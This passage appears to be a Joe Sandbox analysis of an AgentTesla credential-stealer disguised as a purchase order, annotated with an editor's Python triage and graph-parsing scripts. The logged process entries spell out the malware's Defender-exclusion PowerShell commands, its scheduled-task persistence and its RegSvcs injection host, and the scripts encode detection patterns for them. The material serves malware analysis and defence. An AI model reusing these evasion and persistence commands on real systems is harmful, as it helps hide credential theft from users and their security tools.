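                           "seconds_after_ipcheck": round((t - last_ipcheck[pid]).total_seconds(), 3)})
    return alerts


if __name__ == "__main__":
    for a in detect_exfil(EVENTS):
        print(a)
```

Both rules fire on connection attempts, not established sessions, which matters here: in Zeek terms these tcp/25 flows would be `S0` (attempt seen, no reply) and still carry the destination that identifies the exfiltration mailbox host.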



                                            Target ID:0
                                            Start time:05:46:53
                                            Start date:02/07/2024
                                            Path:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                                            Imagebase:0xa0000
                                            File size:1'000'960 bytes
                                            MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                                            Imagebase:0xb40000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                                            Imagebase:0xb40000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                                            Imagebase:0x940000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:05:46:58
                                            Start date:02/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xcb0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:05:46:59
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                            Imagebase:0x990000
                                            File size:1'000'960 bytes
                                            MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 32%, ReversingLabs
                                            • Detection: 35%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:05:47:02
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff693ab0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:05:47:06
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
                                            Imagebase:0x940000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:05:47:06
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:05:47:07
                                            Start date:02/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x450000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Target ID:17
                                            Start time:05:48:18
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\wbem\WMIADAP.exe
                                            Wow64 process (32bit):false
                                            Commandline:wmiadap.exe /F /T /R
                                            Imagebase:0x7ff7f0420000
                                            File size:182'272 bytes
                                            MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true
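The process list above records four things a triage analyst should pull out mechanically rather than by eye: PowerShell adding Defender exclusions (Targets 2 and 4), schtasks registering a task from an XML file in %TEMP% (Targets 6 and 11), RegSvcs.exe started with no arguments at all (Targets 8 and 13), and a copy of the sample with the same MD5 running from %APPDATA% (Target 9). The script below is an added example, the editor's code rather than anything shipped with Joe Sandbox; it re-types an excerpt of those entries as a constructed string, parses the blank-line-separated `Key:Value` blocks and applies those four rules. The rule names and the ATT&CK references in the comments are the editor's, not the report's.

```python
"""Triage rules over a Joe Sandbox process list (added example, editor's code).

SAMPLE_PROCESS_LIST is an excerpt of this report's own "Target ID" blocks,
re-typed as a constructed string so the script runs offline."""
import re

# Constructed from the report's entries for Target IDs 0, 2, 4, 6, 8 and 9.
SAMPLE_PROCESS_LIST = r"""
Target ID:0
Path:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
Commandline:"C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE

Target ID:2
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC

Target ID:4
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC

Target ID:6
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:8
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94

Target ID:9
Path:C:\Users\user\AppData\Roaming\jDCErdK.exe
Commandline:C:\Users\user\AppData\Roaming\jDCErdK.exe
MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE
"""


def parse_process_list(text):
    """Split the report's blank-line-separated 'Key:Value' blocks into dicts."""
    procs, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur:
                procs.append(cur)
                cur = {}
            continue
        key, _, value = line.partition(":")   # first ':' only, so 'C:\...' survives
        cur[key.strip()] = value.strip()
    if cur:
        procs.append(cur)
    return procs


def _has_arguments(cmdline):
    """True when anything follows the (possibly quoted) program token."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)
    return bool(m and m.group(1).strip())


# /XML pointing into the user's %TEMP% directory (Windows path, case-insensitive).
TEMP_XML = re.compile(r'/xml\s+"[^"]*\\appdata\\local\\temp\\', re.IGNORECASE)


def triage(procs):
    """Return (target_id, rule) findings; each rule maps to a line in the report."""
    by_id = {p.get("Target ID"): p for p in procs}
    root_md5 = by_id.get("0", {}).get("MD5 hash", "").lower()
    findings = []
    for p in procs:
        tid, path, cmd = p.get("Target ID"), p.get("Path", ""), p.get("Commandline", "")
        low = cmd.lower()
        # Defender exclusion added for a user-writable path (ATT&CK T1562.001).
        if "add-mppreference" in low and "-exclusionpath" in low:
            findings.append((tid, "defender_exclusion_added"))
        # Scheduled task registered from an XML file in %TEMP% (T1053.005).
        if "schtasks" in low and "/create" in low and TEMP_XML.search(cmd):
            findings.append((tid, "scheduled_task_from_temp_xml"))
        # RegSvcs.exe with no arguments only prints usage; a common hollowing host (T1055.012).
        if path.lower().endswith("\\regsvcs.exe") and not _has_arguments(cmd):
            findings.append((tid, "dotnet_utility_without_arguments"))
        # A copy of the initial sample (same MD5) running from %APPDATA%.
        if (tid != "0" and "\\appdata\\roaming\\" in path.lower()
                and p.get("MD5 hash", "").lower() == root_md5):
            findings.append((tid, "self_copy_in_roaming"))
    return findings


if __name__ == "__main__":
    for tid, rule in triage(parse_process_list(SAMPLE_PROCESS_LIST)):
        print(f"Target {tid}: {rule}")
```

The same rules apply unchanged to the later entries (Targets 11 and 13), which repeat the schtasks and RegSvcs pattern from the `jDCErdK.exe` copy; feeding the full list through `parse_process_list` needs no change to the parser.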


                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:94
                                              Total number of Limit Nodes:6
                                              execution_graph 20546 84d040 20547 84d086 GetCurrentProcess 20546->20547 20549 84d0d1 20547->20549 20550 84d0d8 GetCurrentThread 20547->20550 20549->20550 20551 84d115 GetCurrentProcess 20550->20551 20552 84d10e 20550->20552 20553 84d14b 20551->20553 20552->20551 20554 84d173 GetCurrentThreadId 20553->20554 20555 84d1a4 20554->20555 20663 84d751 20664 84d714 DuplicateHandle 20663->20664 20666 84d75a 20663->20666 20665 84d726 20664->20665 20556 506f9a0 20557 506f9e0 ResumeThread 20556->20557 20559 506fa11 20557->20559 20560 844668 20561 84467a 20560->20561 20562 844686 20561->20562 20566 844779 20561->20566 20571 843e28 20562->20571 20564 8446a5 20567 84479d 20566->20567 20575 844888 20567->20575 20579 844878 20567->20579 20572 843e33 20571->20572 20587 845c44 20572->20587 20574 847048 20574->20564 20577 8448af 20575->20577 20576 84498c 20576->20576 20577->20576 20583 8444b0 20577->20583 20581 8448af 20579->20581 20580 84498c 20580->20580 20581->20580 20582 8444b0 CreateActCtxA 20581->20582 20582->20580 20584 845918 CreateActCtxA 20583->20584 20586 8459db 20584->20586 20588 845c4f 20587->20588 20591 845c64 20588->20591 20590 8470ed 20590->20574 20592 845c6f 20591->20592 20595 845c94 20592->20595 20594 8471c2 20594->20590 20596 845c9f 20595->20596 20599 845cc4 20596->20599 20598 8472c5 20598->20594 20600 845ccf 20599->20600 20602 8485cb 20600->20602 20605 84ac80 20600->20605 20601 848609 20601->20598 20602->20601 20610 84cd7c 20602->20610 20606 84ac85 20605->20606 20615 84aca0 20606->20615 20619 84acb0 20606->20619 20607 84ac8e 20607->20602 20611 84cd99 20610->20611 20612 84cdbd 20611->20612 20643 84cf28 20611->20643 20647 84cf19 20611->20647 20612->20601 20616 84acb0 20615->20616 20622 84ada8 20616->20622 20617 84acbf 20617->20607 20621 84ada8 2 API calls 20619->20621 20620 84acbf 20620->20607 20621->20620 20623 84adb9 20622->20623 20624 84addc 20622->20624 20623->20624 20630 84b030 20623->20630 20635 84b040 20623->20635 
20624->20617 20625 84afe0 GetModuleHandleW 20627 84b00d 20625->20627 20626 84add4 20626->20624 20626->20625 20627->20617 20631 84b0a8 20630->20631 20632 84b03e 20630->20632 20634 84b079 20632->20634 20639 84a130 20632->20639 20634->20626 20636 84b054 20635->20636 20637 84a130 LoadLibraryExW 20636->20637 20638 84b079 20636->20638 20637->20638 20638->20626 20640 84b220 LoadLibraryExW 20639->20640 20642 84b299 20640->20642 20642->20634 20645 84cf35 20643->20645 20644 84cf6f 20644->20612 20645->20644 20651 84bae0 20645->20651 20649 84cf35 20647->20649 20648 84cf6f 20648->20612 20649->20648 20650 84bae0 2 API calls 20649->20650 20650->20648 20652 84bae5 20651->20652 20654 84dc88 20652->20654 20655 84d2dc 20652->20655 20654->20654 20656 84d2e7 20655->20656 20657 845cc4 2 API calls 20656->20657 20658 84dcf7 20657->20658 20658->20654 20659 506fe88 20660 506fecd Wow64SetThreadContext 20659->20660 20662 506ff15 20660->20662
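The execution_graph line above is a flat token stream: a decimal node id, the node's code address, optionally the Windows API reached at that node, and `src->dst` edges (nodes that only aggregate calls carry an annotation such as `2 API calls`). The parser below is an added example, the editor's code and not part of Joe Sandbox, that recovers nodes, edges and the per-address API list from a constructed excerpt of that line and flags the one combination worth checking first in this graph: Wow64SetThreadContext together with ResumeThread, the pair used to point a suspended thread at injected code. That reading is the editor's; the report itself only lists the calls. The address and API-name regexes are assumptions that fit this report's text.

```python
"""Parse Joe Sandbox's execution_graph token stream (added example, editor's code).

SAMPLE_GRAPH is a constructed excerpt of this report's own execution_graph line."""
import re

SAMPLE_GRAPH = (
    "execution_graph 20546 84d040 20547 84d086 GetCurrentProcess 20546->20547 "
    "20549 84d0d1 20547->20549 20550 84d0d8 GetCurrentThread 20547->20550 "
    "20549->20550 20551 84d115 GetCurrentProcess 20550->20551 20552 84d10e 20550->20552 "
    "20553 84d14b 20551->20553 20552->20551 20554 84d173 GetCurrentThreadId 20553->20554 "
    "20663 84d751 20664 84d714 DuplicateHandle 20663->20664 "
    "20556 506f9a0 20557 506f9e0 ResumeThread 20556->20557 20559 506fa11 20557->20559 "
    "20584 845918 CreateActCtxA 20583->20584 "
    "20625 84afe0 GetModuleHandleW 20627 84b00d 20625->20627 "
    "20637 84a130 LoadLibraryExW 20636->20637 "
    "20650 84bae0 2 API calls 20649->20650 "
    "20659 506fe88 20660 506fecd Wow64SetThreadContext 20659->20660 20662 506ff15 20660->20662"
)

NODE_ID = re.compile(r"^\d+$")
HEX_ADDR = re.compile(r"^[0-9a-f]{5,8}$")          # assumption: 32-bit addresses, lowercase hex
EDGE = re.compile(r"^(\d+)->(\d+)$")
# CamelCase Win32 export names; rejects '2', 'API' and 'calls' from the aggregate annotation.
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")


def parse_execution_graph(text):
    """Return ({node_id: {'addr': int, 'apis': [...]}}, [(src, dst), ...])."""
    tokens = text.split()
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append(edge.groups())
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = tok                               # "<id> <addr>" opens a node
            nodes[current] = {"addr": int(tokens[i + 1], 16), "apis": []}
            i += 1                                      # consume the address token too
        elif current is not None and API_NAME.match(tok):
            nodes[current]["apis"].append(tok)          # API reached at the open node
        i += 1
    return nodes, edges


def apis_by_address(nodes):
    """Map each API name to the set of code addresses it was reached from."""
    out = {}
    for n in nodes.values():
        for api in n["apis"]:
            out.setdefault(api, set()).add(n["addr"])
    return out


# Editor's list: the calls that rewrite a thread's context before it is resumed.
CONTEXT_REWRITE = {"SetThreadContext", "Wow64SetThreadContext"}


def injection_indicator(nodes):
    """True when some node rewrites a thread context and some node resumes a thread."""
    seen = set(apis_by_address(nodes))
    return bool(seen & CONTEXT_REWRITE) and "ResumeThread" in seen


def main():
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    for api, addrs in sorted(apis_by_address(nodes).items()):
        print(f"{api:24s} {', '.join(hex(a) for a in sorted(addrs))}")
    print("nodes:", len(nodes), "edges:", len(edges),
          "context-rewrite+resume:", injection_indicator(nodes))


if __name__ == "__main__":
    main()
```

Run as a script it prints each API with the addresses it was reached from. Note that the ResumeThread and Wow64SetThreadContext nodes sit at 0x506f9e0 and 0x506fecd, well outside the 0x840000 region that the control-flow graphs in this report are dumped from, which is the first place to look when carving the injected payload from the memory dumps listed under each graph.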

                                              Control-flow Graph

                                              control_flow_graph 295 84d031-84d0cf GetCurrentProcess 299 84d0d1-84d0d7 295->299 300 84d0d8-84d10c GetCurrentThread 295->300 299->300 301 84d115-84d149 GetCurrentProcess 300->301 302 84d10e-84d114 300->302 303 84d152-84d16d call 84d618 301->303 304 84d14b-84d151 301->304 302->301 308 84d173-84d1a2 GetCurrentThreadId 303->308 304->303 309 84d1a4-84d1aa 308->309 310 84d1ab-84d20d 308->310 309->310
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0084D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0084D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0084D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0084D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 38990690b3370fe287d6a73ef8530c820ef2fa3dc21c7ef390c6b4a24562e84e
                                              • Instruction ID: 6a94846f31aef22a5a3315e3e12b6fbcfcccfd60d110324c908c562de5cf3cfc
                                              • Opcode Fuzzy Hash: 38990690b3370fe287d6a73ef8530c820ef2fa3dc21c7ef390c6b4a24562e84e
                                              • Instruction Fuzzy Hash: 3F5134B09003498FDB14DFA9D548BDEBBF1FB48304F20846AE459A73A1DB749984CB65

                                              Control-flow Graph

                                              control_flow_graph 317 84d040-84d0cf GetCurrentProcess 321 84d0d1-84d0d7 317->321 322 84d0d8-84d10c GetCurrentThread 317->322 321->322 323 84d115-84d149 GetCurrentProcess 322->323 324 84d10e-84d114 322->324 325 84d152-84d16d call 84d618 323->325 326 84d14b-84d151 323->326 324->323 330 84d173-84d1a2 GetCurrentThreadId 325->330 326->325 331 84d1a4-84d1aa 330->331 332 84d1ab-84d20d 330->332 331->332
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0084D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0084D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0084D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0084D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: fe4b830d9567cec3c4919aa931bb6fc14ceb7aca16916b208ab6979d5e4a494c
                                              • Instruction ID: 5d02827dac463b7bb77a8c2787bb941cedf72a9611dfc0b7707b366e93d28800
                                              • Opcode Fuzzy Hash: fe4b830d9567cec3c4919aa931bb6fc14ceb7aca16916b208ab6979d5e4a494c
                                              • Instruction Fuzzy Hash: DB5123B09003498FDB14DFAAD548B9EBBF1FB48304F208469E859A7361DB749988CB65

                                              Control-flow Graph

                                              control_flow_graph 362 84ada8-84adb7 363 84ade3-84ade7 362->363 364 84adb9-84adc6 call 84a0cc 362->364 366 84ade9-84adf3 363->366 367 84adfb-84ae3c 363->367 371 84addc 364->371 372 84adc8 364->372 366->367 373 84ae3e-84ae46 367->373 374 84ae49-84ae57 367->374 371->363 419 84adce call 84b030 372->419 420 84adce call 84b040 372->420 373->374 375 84ae59-84ae5e 374->375 376 84ae7b-84ae7d 374->376 378 84ae60-84ae67 call 84a0d8 375->378 379 84ae69 375->379 381 84ae80-84ae87 376->381 377 84add4-84add6 377->371 380 84af18-84af94 377->380 385 84ae6b-84ae79 378->385 379->385 412 84af96-84afbe 380->412 413 84afc0-84afd8 380->413 382 84ae94-84ae9b 381->382 383 84ae89-84ae91 381->383 386 84ae9d-84aea5 382->386 387 84aea8-84aeaa call 84a0e8 382->387 383->382 385->381 386->387 391 84aeaf-84aeb1 387->391 393 84aeb3-84aebb 391->393 394 84aebe-84aec3 391->394 393->394 395 84aec5-84aecc 394->395 396 84aee1-84aeee 394->396 395->396 398 84aece-84aede call 84a0f8 call 84a108 395->398 402 84aef0-84af0e 396->402 403 84af11-84af17 396->403 398->396 402->403 412->413 414 84afe0-84b00b GetModuleHandleW 413->414 415 84afda-84afdd 413->415 416 84b014-84b028 414->416 417 84b00d-84b013 414->417 415->414 417->416 419->377 420->377
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0084AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 69a73bb0d8c5b77b2d58909f34b4cf94d39c7be0c126fb394b28d9041cba70c4
                                              • Instruction ID: 65fe662482454585522e8de86d07cd875ac22535a5df9ce589e1b4f2d248b0e1
                                              • Opcode Fuzzy Hash: 69a73bb0d8c5b77b2d58909f34b4cf94d39c7be0c126fb394b28d9041cba70c4
                                              • Instruction Fuzzy Hash: 15814970A00B098FD728DF29D44579ABBF1FF48304F00892DD49ADBA51D775E94ACB91

                                              Control-flow Graph

                                              control_flow_graph 421 8444b0-8459d9 CreateActCtxA 424 8459e2-845a3c 421->424 425 8459db-8459e1 421->425 432 845a3e-845a41 424->432 433 845a4b-845a4f 424->433 425->424 432->433 434 845a60 433->434 435 845a51-845a5d 433->435 437 845a61 434->437 435->434 437->437
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 008459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7891642480e9e19785cdb5fff25ea1879b8f173ded58e0d1c399d07bded15206
                                              • Instruction ID: 4f786cef9d156f887bbc7eb8f7cd12114e4edb765216032cc0252ad36fb099e9
                                              • Opcode Fuzzy Hash: 7891642480e9e19785cdb5fff25ea1879b8f173ded58e0d1c399d07bded15206
                                              • Instruction Fuzzy Hash: C741D2B0C0062DCBDB24CFA9C884B8EBBB5FF48304F24816AD409AB256DB755949CF90

                                              Control-flow Graph

                                              control_flow_graph 438 84590d-8459d9 CreateActCtxA 440 8459e2-845a3c 438->440 441 8459db-8459e1 438->441 448 845a3e-845a41 440->448 449 845a4b-845a4f 440->449 441->440 448->449 450 845a60 449->450 451 845a51-845a5d 449->451 453 845a61 450->453 451->450 453->453
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 008459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 1f172e3437cce45963c2fa4ebf099d48dd8c8cc2e64bd3488a107ad5424a688d
                                              • Instruction ID: 1b874e19f07b5493d36fede12e612547ece79a98902f19fd0165edbe3380953b
                                              • Opcode Fuzzy Hash: 1f172e3437cce45963c2fa4ebf099d48dd8c8cc2e64bd3488a107ad5424a688d
                                              • Instruction Fuzzy Hash: 0241B2B0C0061DCBDB24CFA9C884BCEBBB5BF49304F24819AD449AB255DB755949CF90

                                              Control-flow Graph

                                              control_flow_graph 454 84d751-84d758 455 84d714-84d724 DuplicateHandle 454->455 456 84d75a-84d87e 454->456 457 84d726-84d72c 455->457 458 84d72d-84d74a 455->458 457->458
                                              APIs
